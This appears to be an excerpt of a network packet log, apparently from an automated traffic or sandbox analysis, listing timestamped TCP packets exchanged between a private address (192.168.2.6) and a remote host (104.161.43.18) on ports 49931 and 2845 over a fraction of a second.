                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.264929056 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.265070915 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.265175104 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.266016960 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.266077995 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.266150951 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.267049074 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.267153978 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.267565966 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.268157959 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.268203974 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.268285036 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.269099951 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.269159079 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.269328117 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.270205975 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.270308018 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.270391941 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.271363020 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.271378994 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.271462917 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.272377968 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.272394896 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.272526979 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.273413897 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.273535013 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.273582935 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.274358988 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.274456024 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.274533987 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.275402069 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.275538921 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.275599957 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.276501894 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.276556969 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.276755095 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.277527094 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.277738094 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.278093100 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.278565884 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.278829098 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.278876066 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.279661894 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.279807091 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.279890060 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.280666113 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.280965090 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.281025887 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.281768084 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.281797886 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.281907082 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.282851934 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.282879114 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.283055067 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.283844948 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.283914089 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.284686089 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.284930944 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.284946918 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.285012007 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.285928965 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.285945892 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.286010981 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.286956072 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.287122965 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.287338972 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.288058043 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.288073063 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.288199902 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.289113045 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.289128065 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.289196968 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.290222883 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.290239096 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.290558100 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.291191101 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.291207075 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.291281939 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.292196989 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.292376041 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.292418003 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.293282986 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.293299913 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.293376923 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.294310093 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.294363976 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.294527054 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.295347929 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.295454979 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.295572042 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.296426058 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.296559095 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.296679020 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.297489882 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.297545910 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.297761917 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.298505068 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.298648119 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.298824072 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.299597979 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.299731016 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.300617933 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.300621986 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.300658941 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.300725937 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.301656961 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.301671982 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.301765919 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.302699089 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.302833080 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.302906036 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.303761005 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.303929090 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.304052114 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.304991961 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.305165052 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.305875063 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.305949926 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.305979013 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.306037903 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.306900024 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.307027102 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.307112932 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.307889938 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.352729082 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.445317984 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.445339918 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.445431948 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.445828915 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.446026087 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.446238995 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.446860075 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.447082996 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.447253942 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.447947025 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.447962046 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.448051929 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.448966026 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.449022055 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.449065924 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.450047016 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.450100899 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.450165987 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.451075077 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.451148987 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.452208042 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.452224970 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.452249050 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.452274084 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.453214884 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.453231096 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.453291893 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.454194069 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.454210043 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.454432011 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.455275059 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.455318928 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.455385923 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.456294060 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.456446886 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.456499100 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.457411051 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.457513094 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.457560062 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.458465099 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.458481073 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.458551884 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.459563017 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.459728003 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.459783077 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.460583925 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.460716009 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.460892916 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.461631060 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.461651087 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.461736917 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.462685108 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.462701082 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.462770939 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.463932037 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.464063883 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.464123011 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.464778900 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.464848042 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.464905977 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.465856075 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.465872049 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.466029882 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.466841936 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.467319012 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.467369080 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.467861891 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.467879057 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.468027115 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.468874931 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.468991041 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.469032049 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.469928980 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.470103979 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.470521927 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.470974922 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.471162081 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.471250057 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.472090006 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.472405910 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.472460032 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.473118067 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.473215103 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.473470926 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.474189043 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.474287033 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.475164890 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.475227118 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.475258112 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.475308895 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.476244926 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.476406097 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.476550102 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.477356911 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.477374077 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.478554964 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.478571892 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.478607893 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.478722095 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.479358912 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.479419947 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.479460955 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.480468988 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.480575085 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.480699062 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.481511116 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.481653929 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.481822014 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.482487917 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.482676029 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.482724905 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.483546019 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.483671904 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.483797073 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.484824896 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.484839916 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.484899998 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.485758066 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.485877037 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.486105919 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.486757994 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.486900091 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.487310886 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.487953901 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.487970114 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.488027096 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.488899946 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.488992929 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.489048958 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.490058899 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.490361929 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.491520882 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.492392063 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.492408991 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.492466927 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.493300915 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.493350983 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.493462086 CET499312845192.168.2.6104.161.43.18
